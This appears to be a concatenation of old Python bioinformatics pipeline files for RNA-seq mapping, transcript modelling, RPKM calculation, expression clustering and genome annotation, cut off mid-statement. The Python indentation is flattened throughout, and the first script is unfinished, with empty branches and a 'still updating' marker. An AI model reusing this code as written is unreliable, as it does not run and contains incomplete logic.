# genic: set of all genic regions - remainder after subtracting all exonic regions are intronic regions
# intronic: intronic regions
# cuff_introns: genic regions (intronic) which are expanded by Cufflinks models
# cuff_exons: genic regions (exonic) which are expanded by Cufflinks models
# intergenic: all intergenic regions
# UTRs: UTRs of pc genes (created later)
# iterate through the file grabbing CDS, pc sequence, other_ens, genic regions
gene_ids={}
for line in ens_gtf:
la = line.rstrip('\n').split('\t')
if la[1] == "protein_coding":
if la[2] == "CDS":
CDS[ la[0] ] = CDS.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
else:
pc_exons[ la[0] ] = pc_exons.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
else:
other_ens[ la[0] ] = other_ens.get(la[0], interval()) | interval[min( map(int,la[3:5]) ), max( map(int,la[3:5]) )]
gene_id = la[8].split('";')[0].split('"')[1]
gene_ids[ gene_id ] = gene_ids.get(gene_id, [la[0],set([])])
gene_ids[ gene_id ][1].add(int(la[3])); gene_ids[ gene_id ][1].add(int(la[4]))
for gene_id, coords in gene_ids.iteritems():
genic[coords[0]] = genic.get(coords[0], interval()) | interval[min(coords[1]),max(coords[1])]
# get all intronic
for chrom in chroms:
# iterate through all intervals in genic[chrom], removing those pieces found in pc_exons and other_ens
for interv in genic.get(chrom, interval()).components:
if len( interv & pc_exons.get(chrom, interval()) ) == 0 and len( interv & other_ens.get(chrom, interval()) ) == 0: # if no overlap at all (if we're good)
intronic[chrom] = intronic.get(chrom, interval()) | genic[chrom]
elif len( interv & pc_exons.get(chrom, interval()) ) == 0 and len( interv & other_ens.get(chrom, interval()) ) > 0: # if only overlaps other_ens
elif len( interv & pc_exons.get(chrom, interval()) ) > 0 and len( interv & other_ens.get(chrom, interval()) ) == 0: # if only overlaps
else: # if overlaps both
intronic### NOTE STILL UPDATING FROM HERE DOWNWARD!!!!!!!!!
intronic[chrom].difference_update( pc_exons[chrom] )
intronic[chrom].difference_update( other_ens[chrom] )
UTRs = pc_exons
for chrom in chroms:
UTRs[chrom].difference_update( CDS[chrom] )
old_idi_id=""; cuff_coords=interval(); firsttime=True; cuff_present=False
for line in cuff:
la = line.rstrip('\n').split('\t')
idi_id = la[8].split('";')[0].split('"')[1]
if (not firsttime) and (not idi_id == old_idi_id):
old_idi_id = idi_id
if ens_here and cuff_present:
cuff_exons[chrom].update( cuff_coords )
cuff_introns_here = interval.IntervalSet([interval.Interval( cuff_exons[chrom].lower_bound(), cuff_exons[chrom].upper_bound() )])
cuff_introns_here.difference_update( cuff_exons[chrom] )
cuff_introns[chrom].update(cuff_introns_here)
cuff_coords=interval.IntervalSet([])
ens_here = False
cuff_present = False
firsttime = False
chrom = la[0]
if la[1] == "Cufflinks":
cuff_coords.add( interval.Interval(min( map(int,la[3:5]) ), max( map(int,la[3:5]) )) )
cuff_present=True
else:
ens_here = True
if ens_here and cuff_present: # accounting for the final iteration
cuff_exons[chrom].update( cuff_coords )
cuff_introns_here = interval.IntervalSet([interval.Interval( cuff_exons[chrom].lower_bound(), cuff_exons[chrom].upper_bound() )])
cuff_introns_here.difference_update( cuff_exons[chrom] )
cuff_introns[chrom].update(cuff_introns_here)
for chrom in chroms:
cuff_introns[chrom].difference_update(genic[chrom])
cuff_exons[chrom].difference_update(genic[chrom])
# function to return a list of tuples (start, end, category name)
def return_intervals(interv_set, catname):
coords = []
for interv in interv_set:
coords.append( (interv.lower_bound, interv.upper_bound, catname) )
return coords
# CDS
# UTRs
# other_ens
# intronic
# cuff_exons
# cuff_introns
for chrom in chroms:
sorted_coords = []
sorted_coords.extend( return_intervals(CDS[chrom],"CDS") )
sorted_coords.extend( return_intervals(UTRs[chrom],"UTR") )
sorted_coords.extend( return_intervals(other_ens[chrom],"other_ens") )
sorted_coords.extend( return_intervals(intronic[chrom],"intron") )
sorted_coords.extend( return_intervals(cuff_exons[chrom],"cuff_exons") )
sorted_coords.extend( return_intervals(cuff_introns[chrom],"cuff_introns") )
sorted_coords.sort()
for trio in sorted_coords:
print "\t".join([chrom, str(trio[0]), str(trio[1]), trio[2]])
```
#### File: cgat/obsolete/pipeline_rmaa.py
```python
from ruffus import *
import CGAT.Experiment as E
import sys
import os
import re
import shutil
import itertools
import math
import glob
import logging
import time
# for plotting
try:
import matplotlib
import pylab
PLOT = True
except RuntimeError:
PLOT = False
import numpy
# load options from the config file
import CGAT.Pipeline as P
P.getParameters(
["%s/pipeline.ini" % os.path.splitext(__file__)[0],
"../pipeline.ini",
"pipeline.ini" ] )
PARAMS = P.PARAMS
if os.path.exists("conf.py"):
E.info( "reading additional configuration from conf.py" )
execfile("conf.py")
USECLUSTER=True
# there can be several samples per tissue
parameters = ( ["reads/tissue1/sample1.export.gz",
("reads/tissue1/sample1.1.fq.gz",
"reads/tissue1/sample1.2.fq.gz") ],
["reads/tissue2/sample1.export.gz",
("reads/tissue2/sample1.1.fq.gz",
"reads/tissue2/sample1.2.fq.gz") ],
)
@files( [ ( x, ("%s.1.fq.gz" % x[:-len(".export.gz")],
"%s.2.fg.gz" % x[:-len(".export.gz")] ) ) \
for x in glob.glob("reads/*/*.export.gz" ) ] )
def exportToFastQ( infile, outfiles):
"""
Creates fastq files of paired-ended reads from export files.
"""
to_cluster = USECLUSTER
outfile1, outfile2 = outfiles
statement = '''
python %(rmaadir)s/exports_to_fq.py
%(infile)s
%(outfile1)s
%(outfile2)s
%(remove_bases_from_right)i
%(new_quals)s
'''
P.run()
@files( [ ( "%s/*.export.gz" % x, "%s/insert_sizes" % x )
for x in glob.glob("reads/*" ) if os.path.isdir(x) ] )
def estimateInsertSizes( infiles, outfile):
"""
Plots the internal insert size distribution and calculates the average and standard deviation based on the FWHM
"""
infiles = " ".join(infiles)
to_cluster = USECLUSTER
statement = '''
zcat %(infiles)s | python %(rmaadir)s/return_insert_sizes.py > %(outfile)s
'''
P.run()
# required to resolve strange timing issues
# when trying to open the file in the next command
P.touch( outfile )
ins_sizes_array=numpy.array( [map(int, x[:-1].split("\t")) for x in open(outfile, "r")] )
max_freq=ins_sizes_array[:,1].max()
half_max=float(max_freq)/2.0
E.info( "maximum frequency=%i, halfwidth=%i" % (max_freq, half_max))
# get half width coordinates
for bin, value in ins_sizes_array:
if value < half_max: continue
FWHMmin=bin
break
for bin, value in ins_sizes_array[::-1]:
if value < half_max: continue
FWHMmax=bin
break
FWHM=FWHMmax-FWHMmin
std_dev=int(float(FWHM)/2.3548)
ins_size=int(FWHMmin+float(FWHM)/2.0)-PARAMS["remove_bases_from_right"]
E.info( "".join(["For ", infiles, " FWHM is ", str(FWHM), " ranging from ", str(FWHMmin), " to ", str(FWHMmax), ". std dev ",
str(std_dev), " and ins size ", str(ins_size)] ) )
x, y= [], []
for bin,value in ins_sizes_array:
if FWHMmin - 2 * std_dev < bin < FWHMmax + 2 * std_dev:
x.append(bin)
y.append(value)
if PLOT:
pylab.title("Insert size")
pylab.xlabel('inner distance between sequenced ends')
pylab.ylabel('frequency based on unique eland mappings')
pylab.scatter(x,y)
pylab.savefig(outfile + ".png")
fwhm_file=open(outfile + ".txt", 'w')
my_str='%s\t%s\n' % (ins_size, std_dev)
fwhm_file.write(my_str)
fwhm_file.close()
def getInsertSizes( dirname ):
with open( '%s/insert_sizes.txt' % dirname, 'r') as tmp_f:
ins_size, std_dev = map( int, tmp_f.readline().rstrip('\n').split('\t'))
return ins_size, std_dev
@follows( exportToFastQ, estimateInsertSizes, mkdir("logs/juncs"))
@collate( exportToFastQ, regex(r"reads\/(.+)\/(.+)\..\.fq.gz$"), r'reads/\1/\2.junctions' )
def findJunctions(infiles, outfile):
'''map reads using all known junctions in order to identify new possible junctions -
cat the junctions together and delete the tophat output directories
'''
ins_size, std_dev = getInsertSizes( os.path.dirname( outfile[:-len(".junctions") ] ) )
nslots = 4
fastq1, fastq2 = infiles[0]
tmpfilename = P.getTempFilename()
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
job_options= "-pe dedicated 4-8 -l mem_free=3G -R y"
to_cluster = USECLUSTER
# tophat does a seek operation on the fq files, hence they
# need to unpacked into real files
statement = '''
gunzip < %(fastq1)s > %(tmpfilename)s.1.fq;
gunzip < %(fastq2)s > %(tmpfilename)s.2.fq;
tophat --output-dir %(tmpfilename)s
--butterfly-search
--min-anchor-length 5
--closure-search
--microexon-search
--min-isoform-fraction 0.0
--mate-inner-dist %(ins_size)i
--mate-std-dev %(std_dev)i
--max-intron-length %(max_intron)i
--raw-juncs %(junctions_file)s
-p %(nslots)i
%(bowtiedir)s/%(genome)s
%(tmpfilename)s.1.fq
%(tmpfilename)s.2.fq
>& %(outfile)s.log;
mv %(tmpfilename)s/junctions.bed %(outfile)s >& %(outfile)s.log2;
mv %(tmpfilename)s/logs %(outfile)s.logs >& %(outfile)s.log3;
rm -rf %(tmpfilename)s %(tmpfilename)s.1.fq %(tmpfilename)s.2.fq >& %(outfile)s.log4
'''
P.run()
@merge(findJunctions, "reads/all.junctions")
def combineJunctions(infiles, outfile):
'''collate all junctions found with tophat together.'''
infiles = " ".join(infiles)
statement = '''
cat %(infiles)s
| grep -v description
| python %(rmaadir)s/combine_junctions.py
| sort
| uniq
> %(outfile)s'''
P.run()
@follows( combineJunctions)
@collate( exportToFastQ,
regex(r"reads\/(.+)\/(.+)\..\.fq.gz$"),
r'reads/\1/\2.bam' )
def mapReads(infiles, outfile):
'''map reads using all known junctions and all junctions found before.
This method requires the explicit genome in bowtiedir together with the
samtools index. Using a flattened genome file will not work due to
the limit of a line length of 65536 in samtools.
'''
if not os.path.exists( "%(bowtiedir)s/%(genome)s.fa" % PARAMS ):
raise ValueError( "genome %(bowtiedir)s/%(genome)s.fa does not exist - create with bowtie-inspect first" % PARAMS)
ins_size, std_dev = getInsertSizes( os.path.dirname( outfile[:-len(".bam") ] ) )
nslots = 4
fastq1, fastq2 = infiles[0]
tmpfilename = P.getTempFilename()
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
job_options= "-pe dedicated 4-8 -l mem_free=3G -R y"
to_cluster = USECLUSTER
junctions_file = "reads/all.junctions"
# WARNING: contents of tmpfile can get large (20Gb or more)
statement = '''
gunzip < %(fastq1)s > %(tmpfilename)s.1.fq;
gunzip < %(fastq2)s > %(tmpfilename)s.2.fq;
tophat --output-dir %(tmpfilename)s
--min-isoform-fraction 0.0
--mate-inner-dist %(ins_size)i
--mate-std-dev %(std_dev)i
--raw-juncs %(junctions_file)s
-p %(nslots)i
%(bowtiedir)s/%(genome)s
%(tmpfilename)s.1.fq
%(tmpfilename)s.2.fq
>& %(outfile)s.log;
mv %(tmpfilename)s/accepted_hits.bam %(outfile)s 2>> %(outfile)s.log;
rm -rf %(tmpfilename)s 2>> %(outfile)s.log;
rm -f %(tmpfilename)s.1.fq %(tmpfilename)s.2.fq 2>> %(outfile)s.log
'''
P.run()
@follows( mkdir( "mappings" ) )
@collate( mapReads,
regex(r"reads/(.+)/(.+).bam$"),
r'mappings/\1.multi.bam' )
def combineBams(infiles, outfile):
'''collate all resultant bams together and index.
This method assumes that BAM files have been sorted consistently by bowtie.
'''
to_cluster = USECLUSTER
infile = infiles[0]
if len(infiles) > 1:
infiles = " ".join(infiles)
statement = '''samtools merge -h %(infile)s %(outfile)s %(infiles)s >& %(outfile)s.log'''
P.run()
else:
shutil.copyfile( infile, outfile )
# assume that files are sorted
# statement = '''samtools sort %(outfile)s'''
# P.run()
statement = '''samtools index %(outfile)s >& %(outfile)s.log'''
P.run()
@transform(combineBams, suffix(".multi.bam"), ".unique.bam")
def uniquifyBams( infile, outfile ):
'''extract unique hits'''
to_cluster = USECLUSTER
statement = '''python %(rmaadir)s/uniquify_bam.py %(infile)s %(outfile)s'''
P.run()
statement = '''samtools index %(outfile)s'''
P.run()
@transform(combineBams, suffix(".multi.bam"), ".gtf")
def buildGeneModels(infile, outfile):
'''build transcript models - run cufflinks on each region seperately'''
to_cluster = USECLUSTER
track = os.path.basename( outfile[:-len(".gtf")] )
ins_size, std_dev = getInsertSizes( "reads/%s" % track )
tmpfilename = P.getTempFilename()
nslots = 4
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
infile = os.path.abspath( infile )
outfile = os.path.abspath( outfile )
statement = '''mkdir %(tmpfilename)s;
samtools view %(infile)s | sort -k3,3 -k4,4n 2> %(outfile)s.log1 > %(tmpfilename)s/temp.sam;
cd %(tmpfilename)s;
cufflinks --inner-dist-mean %(ins_size)i
--inner-dist-stddev %(std_dev)i
--label %(track)s
--num-threads %(nslots)i
--min-isoform-fraction %(cuff_min_isoform)f
--pre-mrna-fraction %(cuff_pre_mrna)f
%(tmpfilename)s/temp.sam >& %(outfile)s.log2;
mv transcripts.gtf %(outfile)s >& %(outfile)s.log3;
rm -rf %(tmpfilename)s >& %(outfile)s.log4
'''
P.run()
@follows( mkdir("transcripts") )
@collate( buildGeneModels,
regex(r"mappings/(.+).gtf$"),
'transcripts/summary.txt' )
def compareGeneModels(infiles, outfile):
'''compare transcript models, using a reference GTF'''
to_cluster = USECLUSTER
infiles = " ".join(infiles)
statement = '''
cuffcompare
-o %(outfile)s
-r %(files_gtf)s
-s %(bowtiedir)s/%(genome)s.fa
%(infiles)s >& %(outfile)s.log
'''
P.run()
@follows( mkdir("transcripts"))
@merge( buildGeneModels,
["transcripts/all.shortreads.gtf", "transcripts/all.combined.gtf"] )
def combineGeneModels(infiles, outfiles):
'''combine Cufflinks gene models together, and also combine with the given reference GTF.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
infiles = " ".join(infiles)
outfile1, outfile2 = outfiles
statement = '''cat %(infiles)s
| awk '$3 == "exon"'
| python %(scriptsdir)s/gtf2gtf.py --merge-genes --log=%(outfile1)s.log
| python %(scriptsdir)s/gtf2gtf.py --renumber-genes="SR%%010i" --log=%(outfile1)s.log
> %(outfile1)s'''
P.run()
statement = '''cat %(infiles)s %(files_gtf)s
| awk '$3 == "exon"'
| python %(scriptsdir)s/gtf2gtf.py --merge-genes --log=%(outfile2)s.log
| python %(scriptsdir)s/gtf2gtf.py --renumber-genes="ALL%%010i" --log=%(outfile2)s.log
> %(outfile2)s'''
P.run()
@transform(uniquifyBams, suffix(".bam"), ".counts")
def countReads(infile, outfile):
'''count reads in Ensembl protein-coding models.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
statement = '''
python %(rmaadir)s/count_reads_in_genes.py %(files_genes)s %(infile)s > %(outfile)s
'''
P.run()
@follows(combineBams)
@transform(combineBams, suffix(".bam"), ".counts")
def countReadsMulti(infile, outfile):
'''count MULTI reads in Ensembl protein-coding models'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
statement = '''
python %(rmaadir)s/count_reads_in_genes.py %(files_genes)s %(infile)s > %(outfile)s
'''
P.run()
@merge( countReads,
["mappings/unique.counts.all", "mappings/unique.ratios.all"] )
def adjustCounts(infiles, outfiles):
'''normalize raw read counts to adjusted counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=20G"
infiles = " ".join(infiles)
outfile0, outfile1 = outfiles
statement = '''
python %(rmaadir)s/build_adjusted_counts.py
%(outfile1)s %(infiles)s
> %(outfile0)s'''
P.run()
@merge( countReadsMulti,
["mappings/multi.counts.all", "mappings/multi.ratios.all"] )
def adjustCountsMulti(infiles, outfiles):
'''normalize raw read counts to adjusted counts for MULTI reads'''
to_cluster = USECLUSTER
job_options = "-l mem_free=20G"
infiles = " ".join(infiles)
outfile0, outfile1 = outfiles
statement = '''
python %(rmaadir)s/build_adjusted_counts.py
%(outfile1)s %(infiles)s
> %(outfile0)s'''
P.run()
@follows( mkdir("graphs") )
@transform(adjustCounts, suffix(".counts.all"), ".rpkm.all")
def calculateRPKMs(infiles, outfile):
'''calculate RPKMs from adjusted read counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
infile = infiles[0]
statement = '''
python %(rmaadir)s/calculate_rpkms.py %(infile)s
> %(outfile)s
'''
P.run()
def generate_calculate_term_params():
for dbname, location in P.asDict("databases").iteritems():
yield [ "mappings/unique.rpkm.all", "mappings/unique.term_patterns.%s" % dbname, location ]
@follows(calculateRPKMs)
@files( generate_calculate_term_params )
def calculateTermPatterns(infile, outfile, params):
'''calculate variation between tissues according to (GO) terms.
Might be buggy
'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
statement = '''
python %(rmaadir)s/sort_patterns_by_rel_std_dev.py
%(infile)s %(params)s %(min_rpkm_term_var)i %(min_genes_term_var)i
> %(outfile)s
'''
P.run()
@follows( mkdir("graphs"))
@transform(adjustCountsMulti, suffix(".counts.all"), ".rpkm.all")
def calculateRPKMsMulti(infiles, outfile):
'''calculate RPKMs from MULTI adjusted read counts'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
infile = infiles[0]
statement = '''
python %(rmaadir)s/calculate_rpkms.py %(infile)s
> %(outfile)s
'''
P.run()
def _makeBigwig( infile, outfile, normfile ):
with open(normfile, "r" ) as f:
headers=f.readline().rstrip('\n').split('\t')
ratios_list=f.readline().rstrip('\n').split('\t')
ratios = dict( zip(headers, ratios_list) )
ratio = float( ratios[ infile.rsplit('/',1)[1].split('.')[0] ] )
to_cluster = USECLUSTER
job_options = "-l mem_free=25G"
outfile2 = outfile.rsplit('.',1)[0] + '.wig'
statement = '''
samtools pileup %(infile)s
| awk '{ print $1 "\\t" $2 "\\t" $4 * %(ratio)f }'
| python %(rmaadir)s/pileup_to_wig.py > %(outfile2)s
'''
P.run()
statement = '''
wigToBigWig %(outfile2)s %(chrom_sizes)s %(outfile)s
'''
P.run()
@follows(adjustCounts, uniquifyBams)
@transform(uniquifyBams, suffix(".bam"), ".bw")
def makeBigwigs(infile, outfile):
'''make normalized bigwigs.'''
return _makeBigwig( infile, outfile, "mappings/unique.ratios.all" )
@follows(adjustCountsMulti, combineBams)
@transform(combineBams, suffix(".bam"), ".bw")
def makeBigwigsMulti(infile, outfile):
'''make NORMALIZED bigwigs for MULTI counts'''
return _makeBigwig( infile, outfile, "mappings/multi.ratios.all" )
@follows(calculateRPKMs, mkdir("trees") )
@files( [ ('mappings/unique.rpkm.all', 'trees/genes.%s.tree' % min_rpkm, min_rpkm) \
for min_rpkm in PARAMS["min_rpkm_tree"] ])
def makeTreesAllGenes(infile, outfile, rpkmfile):
'''build region relatedness trees for all genes'''
to_cluster = USECLUSTER
job_options = "-l mem_free=5G"
statement = '''
python %(rmaadir)s/make_trees_weight_genes.py %(infile)s %(rpkmfile)s %(outfile)s
'''
P.run()
############################################################################
############################################################################
############################################################################
## Clustering
############################################################################
@follows( calculateRPKMs, mkdir("fuzzy_k") )
@files( [ ( "mappings/unique.rpkm.all",
("fuzzy_k/all-%s-%s.cdt" % (x,y),
"fuzzy_k/background-%s-%s" % (x,y) ),
x, y ) \
for x,y in itertools.product( PARAMS["min_rpkm"], PARAMS["min_diff"] ) ] )
def buildCDTFiles( infile, outfiles, min_rpkm, min_diff ):
'''build cdt files for fuzzy k clustering.'''
cdt_filename, background_filename = outfiles
min_diff_threshold = math.log( min_diff, 2)
min_gene_len = PARAMS["min_gene_len"]
background_file = open( background_filename, "w" )
with open( cdt_filename, "w" ) as cdt_file:
counts = E.Counter()
counts.output = 0
for line in open(infile,"r"):
if line.startswith("#"): continue
if line.startswith("gene_id"):
# create cdt file
labels = line.rstrip('\n').split('\t')[2::]
cdt_file.write( "UID\tNAME\tGWEIGHT\t%s\n" % ("\t".join( labels ) ) )
cdt_file.write( "EWEIGT\t\t\t%s\n" % ( "\t".join( ["1"] * len(labels))))
continue
data = line[:-1].split("\t")
counts.input += 1
# exclude genes that are too short
if int(data[1]) < min_gene_len:
counts.skipped_length += 1
continue
name = data[0]
la = map(float, data[2:])
# exclude lowly expressed genes
if max(la) < min_rpkm:
counts.skipped_rpkm += 1
continue
background_file.write(name + "\n")
# to handle any zero values, add 0.01 to every RPKM
la = map(lambda x: x + 0.01, la)
avg_rpkm = float(sum(la) ) / len(la)
ratios = [ math.log( x/avg_rpkm, 2) for x in la]
if max(ratios) < min_diff_threshold:
counts.skipped_diff += 1
continue
cdt_file.write( "%s\t%s\t%i\t%s\n" % (name, name, 1,
"\t".join(map(str,ratios)) ) )
counts.output += 1
background_file.close()
E.info( "%s\n" % str(counts) )
# if we have too few genes to cluster anyway, mark it in a bad file so things downstream don't happen
l = len( open(cdt_filename).readlines())
if l - 2 < PARAMS["min_genes_to_cluster"]:
bad_clusters = open('fuzzy_k/bad_clusters','a')
bad_clusters.write( cdt_filename + '\n')
bad_clusters.close()
@transform( buildCDTFiles,
regex(r"all-(.*).cdt"),
(r"instructions-\1", r"centroids-\1", r"membership-\1" ) )
def buildClusters( infiles, outfiles ):
'''run c-means clustering on expression level data.'''
to_cluster = USECLUSTER
job_options = "-l mem_free=10G"
# ignore the background file (why is it included in infiles?)
infile, _ = infiles
instructions_filename, centroid_filename, membership_filename = outfiles
instructions_filename = os.path.abspath( instructions_filename )
cdt_filename = os.path.abspath( infile )
kmeans_clusters = PARAMS["kmeans_clusters"]
# run aerie in a temporary directory
tmpdir = P.getTempDir(".")
with open( instructions_filename, "w" ) as outf:
outf.write( '''load %(cdt_filename)s
fuzzy %(kmeans_clusters)i
%(tmpdir)s/all
exit
''' % locals())
statement = '''
aerie < %(instructions_filename)s >& %(instructions_filename)s.log
'''
P.run()
try:
shutil.move( os.path.join( tmpdir, "all.fct"), centroid_filename )
shutil.move( os.path.join( tmpdir, "all.mb"), membership_filename )
except IOError,msg:
E.warn("no results for %s,%s: %s" % (centroid_filename,
membership_filename,
msg))
P.touch( centroid_filename )
P.touch( membership_filename )
shutil.rmtree( tmpdir )
def getBadClusters():
'''return a list of runs that should not be submitted to clustering.'''
try:
bad_clusters=[ x[:-1] for x in open('fuzzy_k/bad_clusters','r').readlines()]
except IOError:
bad_clusters = []
return bad_clusters
# extract & calculate enrichments in fuzzyK clusters over the background sets;
# extract for several different cutoffs of "membership"
# note some clusters may be degenerate (NEED ANOTHER SCRIPT TO PREPROCESS!)...
def generate_fuzzy_clusters_params():
bad_clusters=getBadClusters()
for min_rpkm in PARAMS["min_rpkm"]:
for min_diff in PARAMS["min_diff"]:
for cluster_lvl in PARAMS["cluster_lvl"]:
if not "fuzzy_k/all-%s-%s.pcl" % (min_rpkm, min_diff) in bad_clusters:
yield [ "fuzzy_k/membership-%s-%s" % (min_rpkm, min_diff), "fuzzy_k/cluster-%s-%s-%s.0" % (min_rpkm, min_diff, cluster_lvl), cluster_lvl ]
@follows( buildClusters )
@files( generate_fuzzy_clusters_params )
def extractClusters(infile, outfile, param0 ):
'''build fuzzy clusters.'''
to_cluster = USECLUSTER
outp = outfile.rsplit('.',1)[0]
statement = '''
python %(rmaadir)s/extract_clusters.py %(infile)s %(outp)s %(param0)s
'''
P.run()
def generate_fuzzy_enrich_params():
'''find enrichments.'''
bad_clusters=getBadClusters()
for min_rpkm, min_diff, cluster_lvl in \
itertools.product( PARAMS["min_rpkm"], PARAMS["min_diff"], PARAMS["cluster_lvl" ] ):
for dbname, location in P.asDict("databases").iteritems():
if "fuzzy_k/all-%s-%s.pcl" % (min_rpkm, min_diff) in bad_clusters: continue
yield [ ["fuzzy_k/background-%s-%s" % (min_rpkm, min_diff),
glob.glob("fuzzy_k/cluster-%s-%s-%s.*" % (min_rpkm, min_diff, cluster_lvl)), location],
["fuzzy_k/%s-summary-cluster-%s-%s-%s.0" % (dbname, min_rpkm, min_diff, cluster_lvl),
"fuzzy_k/%s-expanded-cluster-%s-%s-%s.0" % (dbname, min_rpkm, min_diff, cluster_lvl)] ]
@follows( extractClusters )
@files( generate_fuzzy_enrich_params )
def computeEnrichments(infiles, outfiles):
'''extract enrichments.'''
to_cluster = USECLUSTER
background_filename, foreground_filenames, association_filename = infiles
for foreground_filename in foreground_filenames:
cluster = foreground_filename.rsplit('.',1)[1]
summary_filename = outfiles[0].rsplit('.',1)[0]+'.'+cluster
expanded_filename = outfiles[1].rsplit('.',1)[0]+'.'+cluster
statement = '''
python %(rmaadir)s/compute_enrichments.py
%(foreground_filename)s
%(background_filename)s
%(association_filename)s
%(summary_filename)s
%(expanded_filename)s
'''
P.run()
def generate_enrichments_high_expn_params():
for min_rpkm in PARAMS["min_rpkm_tree"]:
for dbname, location in P.asDict("databases").iteritems():
yield [ ['mappings/unique.rpkm.all', location],
"high_expn/high_expn.%s.%s" % (dbname, min_rpkm), min_rpkm ]
@follows( calculateRPKMs, mkdir("high_expn") )
@files(generate_enrichments_high_expn_params)
def computeEnrichmentsHighlyExpressedGenes( infiles, outfile, min_rpkm):
to_cluster = USECLUSTER
rpkm_filename, association_filename = infiles
statement = '''cat %(rpkm_filename)s
| sed 1d
| awk '{ print $1 }'
> %(outfile)s.background
'''
P.run()
statement = '''cat %(rpkm_filename)s
| awk '{ sum=0; for(i=3; i<=NF; i++) { sum += $i}; sum/=NF; if (sum> %(min_rpkm)i) print $1 }'
> %(outfile)s.foreground
'''
P.run()
statement = '''
python %(rmaadir)s/compute_enrichments.py
%(outfile)s.foreground
%(outfile)s.background
%(association_filename)s
%(outfile)s
%(outfile)s.expanded
'''
P.run()
# Calculate results of all enrichments. For each database, find the best combination of parameters and report this file to a final analysis directory along with the relevant reference files.
def generate_params_report():
for dbname, location in P.asDict("databases").iteritems():
yield [glob.glob("fuzzy_k/%s-summary-cluster-*-*-*.*" % dbname),
"best_conditions/clustering_summary_%s.txt" % dbname]
@follows( computeEnrichments, mkdir("best_conditions") )
@files( generate_params_report )
def reportBestParams(infiles, outfile):
'''report the best parameters.'''
bestfile = ''
bestnumb = 0
outf = open(outfile, 'w')
numbs = {}
fdr = PARAMS["fdr"]
for infile in infiles:
pref = infile.rsplit('.',1)[0]
numbs[pref] = numbs.get( pref, 0 )
numb = 0
with open(infile,"r") as inf:
for line in inf:
if line.startswith("Name"): continue
l = line[:-1].split("\t")
# exit if fdr is above threshold
if float(l[3]) >= fdr: break
numb += 1
numbs[pref] += numb
outf.write( infile + '\t' + str(numb) + '\n' )
if numbs[pref] > bestnumb:
bestnumb = numbs[pref]
bestfile = infile
prefix = bestfile.rsplit('.',1)[0]
for x in glob.glob( "%s.*"% prefix ):
shutil.copyfile( x, "best_conditions/%s" % os.path.basename(x) )
a = bestfile.rsplit('.',1)[0].rsplit('-',3)[1]
b = bestfile.rsplit('.',1)[0].rsplit('-',3)[2]
for x in glob.glob( "fuzzy_k/centroids-%s-%s" % (a,b) ):
shutil.copyfile( x, "best_conditions/%s" % os.path.basename(x) )
def generate_params_totalRNAfunctions():
for dbname, location in P.asDict("databases").iteritems():
yield [['mappings/unique.rpkm.all', location],
["overall_annotations/totalRNA.%s" % dbname,
"overall_annotations/totalRNA_diffs.%s" % dbname]]
@follows( calculateRPKMs, mkdir("overall_annotations") )
@files( generate_params_totalRNAfunctions )
def reportTotalRNAFunctions(infiles, outfiles):
'''report total RNA functions.'''
to_cluster = USECLUSTER
rpkm_filename, annotations_filename = infiles
expression_filename, diff_filename = outfiles
statement = '''
python %(rmaadir)s/report_totalRNA_annotations.py
%(rpkm_filename)s
%(annotations_filename)s
%(expression_filename)s
%(diff_filename)s
'''
P.run()
@follows( makeTreesAllGenes,
combineJunctions,
combineBams,
uniquifyBams,
combineGeneModels,
compareGeneModels,
calculateRPKMs,
calculateRPKMsMulti,
mkdir("web") )
def basic(): pass
@follows( computeEnrichmentsHighlyExpressedGenes,
reportTotalRNAFunctions,
reportBestParams )
def analysis(): pass
@follows( basic, analysis )
def full(): pass
@follows( makeBigwigs,
makeBigwigsMulti )
def export(): pass
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: obsolete/pipeline_rmaa/sort_genes_by_rel_std_dev.py
```python
from sys import argv
from math import sqrt
rpkm_file = open(argv[1],'r')
min_rpkm = float(argv[2])
def calc_rel_std_dev(values):
variance = 0.0
mean = float(sum(values))/len(values)
for val in values:
variance += (val-mean)**2
return sqrt(variance/mean)/mean
by_variance=[]
rpkm_file.readline()
for line in rpkm_file:
la = line.rstrip('\n').split('\t')
if max( map(float, la[2::]) ) < min_rpkm:
continue
by_variance.append( (calc_rel_std_dev( map(float, la[2::]) ), la) )
by_variance.sort()
by_variance.reverse()
for entry in by_variance:
print str(entry[0]) + "\t" + "\t".join(entry[1])
```
#### File: cgat/obsolete/pipeline_vitaminD_annotator.py
```python
import sys
import re
import os
import tempfile
import collections
import shutil
import CGAT.Experiment as E
import CGAT.Pipeline as P
import sqlite3
import gff2annotator
PARAMS = P.getParameters()
############################################################
############################################################
############################################################
## Annotator utility functions
############################################################
def buildAnnotatorWorkSpace( tmpdir, outfile, workspaces=("genomic",), gc_control = False ):
'''write genomic workspace.'''
to_cluster = True
job_options = "-l mem_free=4000M"
tmpworkspaces = []
if gc_control:
tmpworkspace = os.path.join( tmpdir, "workspace_gc" )
tmpsynonyms = os.path.join( tmpdir, "synonyms" )
tmpworkspaces.append( tmpworkspace )
statement = '''
awk '{ printf("%%s\\t%%s\\t%%s\\t%%s.%%s\\n", $1,$2,$3,$1,$4)}' < %(annotator_gc)s |\
python %(scriptsdir)s/bed2gff.py |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--output-filename-synonyms=%(tmpsynonyms)s \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s'''
P.run()
else:
tmpsynonyms = None
for workspace in workspaces:
tmpworkspace = os.path.join( tmpdir, "workspace_%s" % workspace )
if workspace == "genomic":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
< %(genome)s.gff > %(tmpworkspace)s
'''
elif workspace == "promotors":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
